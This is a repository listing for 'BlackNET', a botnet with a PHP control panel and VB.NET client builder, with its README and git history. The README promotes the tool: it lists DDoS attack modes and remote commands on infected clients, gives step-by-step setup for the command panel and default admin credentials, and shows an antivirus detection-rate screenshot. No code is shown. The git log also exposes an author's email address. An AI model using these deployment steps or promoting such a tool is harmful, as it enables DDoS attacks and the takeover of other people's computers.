======================: FILES :======================
BlackNET
├── BlackNET.php
├── BlackNET - PHP Panel.zip
├── BlackNET Sourcecode.rar
├── blacknet.sql
├── BLACKNET v0.1.zip
├── LICENSE
└── README.md

0 directories, 7 files
======================: README CONTENT :======================
![Logo](https://a.top4top.net/p_1104t3ole1.png)

# BlackNET
A Free PHP Interface Botnet with VB.NET based Stub and Builder

## About BlackNET
BlackNET is a simple botnet with PHP Panel and VB.NET Output

Created By : DarkSoftwareCo

## What You Can Do
1. Upload File
2. DDOS Attack [ TCP,UDP,ARME,Slowloris ]
3. Open Webpage
4. Show MessageBox
5. Uninstall Client
6. Close Client

## How to Install PHP Panel
1. Download BlackNET - PHP Panel.zip
2. Upload The ZIP File to your Server
3. Extract it
4. Go to PHPMyAdmin
5. Create a database and name it [ blacknet ]
6. Import blacknet.sql for database structure
7. Change the data in config.php
8. Change blacknet files and folders permission to 7777

## Default Login Data
Username : admin

Password : admin

## Screenshot

![Image of the interface](https://c.top4top.net/p_110481bbz1.png)

![Image of the Builder](https://i.gyazo.com/3aeeb4aab1015b4a6e9c171ad20d21ed.png)

## Client Dectection Rate
![Image of the Dectection](https://antiscan.me/images/result/cYi5BmDOwzWU.png)

## Copyright

Copyright © Black.Hacker and DarkSofrwareCo - 2019
====================== GIT HISTORY: ======================
c689d69 HEAD@{0}: clone: from https://github.com/decay88/BlackNET
commit c689d6903fe372adeb97bfedeebfe08457c4caf9
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Wed Jan 9 23:14:14 2019 +0300

    Update README.md

commit c0e392f49d76ce18137907c6d586f3033fe2b4e7
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Wed Jan 9 22:19:33 2019 +0300

    Update README.md

commit 2cd49ace46efb35b6df3deb38b9d9490062076c1
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Wed Jan 9 22:19:13 2019 +0300

    Update README.md

commit cdca0c7c82ff465cff318880d35ae597911e6ca2
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Wed Jan 9 22:18:07 2019 +0300

    Add files via upload

commit 935ffe2bdd44d4e34b4fc0043af5567ffcf53144
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Wed Jan 9 22:17:30 2019 +0300

    Update README.md

commit ecc856adbef06b5331d137dd40d2202d7a4b10f0
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Wed Jan 9 21:53:53 2019 +0300

    Add files via upload

commit aebc016913a3d959057f23336cdd4f9b34de7407
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Wed Jan 9 13:33:22 2019 +0300

    Update README.md

commit 59288f7edeb6e67dff96a5ebbf5734358584129a
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Wed Jan 9 13:29:41 2019 +0300

    Update README.md

commit e252032179c51a0f6102a01c905294b2166f69f1
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Tue Jan 8 03:33:11 2019 +0300

    Update README.md

commit 7fa926ff1b037455d4eca26189121116484f8573
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Tue Jan 8 02:54:39 2019 +0300

    Update README.md

commit 18a99b6f6b37c1e7bce93c35c22cca822770739f
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Tue Jan 8 02:43:25 2019 +0300

    Update README.md

commit 2ee31e32348e8bb5cd61e9b28e008e015bae676e
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Tue Jan 8 02:34:06 2019 +0300

    Update BlackNET.php

commit 32abfcc8e6120cc680f4a912c9831aea64c35ec8
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Tue Jan 8 02:33:05 2019 +0300

    Create BlackNET.php

commit 82d6591b310c24de5bc2e81b2eb3a6f439aafa0a
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Tue Jan 8 02:08:43 2019 +0300

    Update README.md

commit 73331a87585fa848e3c743cc0b5712e05cf52938
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Fri Jan 4 04:31:42 2019 +0300

    Initial commit
